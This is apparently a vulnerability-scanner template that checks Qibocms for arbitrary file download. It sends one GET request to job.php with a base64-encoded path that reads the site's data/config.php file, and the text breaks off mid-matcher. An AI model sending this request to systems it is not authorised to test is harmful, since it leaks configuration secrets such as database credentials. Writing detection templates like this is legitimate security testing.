id: qibocms-file-download

info:
  name: Qibocms - Arbitrary File Download
  author: theabhinavgaur
  severity: high
  description: Qibocms is vulnerable to arbitrary file download.
  metadata:
    verified: true
    max-request: 1
  tags: qibocms,lfr

http:
  - method: GET
    path:
      # The url parameter is base64; this value decodes to "data/config.ph<".
      - "{{BaseURL}}/do/job.php?job=download&url=ZGF0YS9jb25maWcucGg8"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "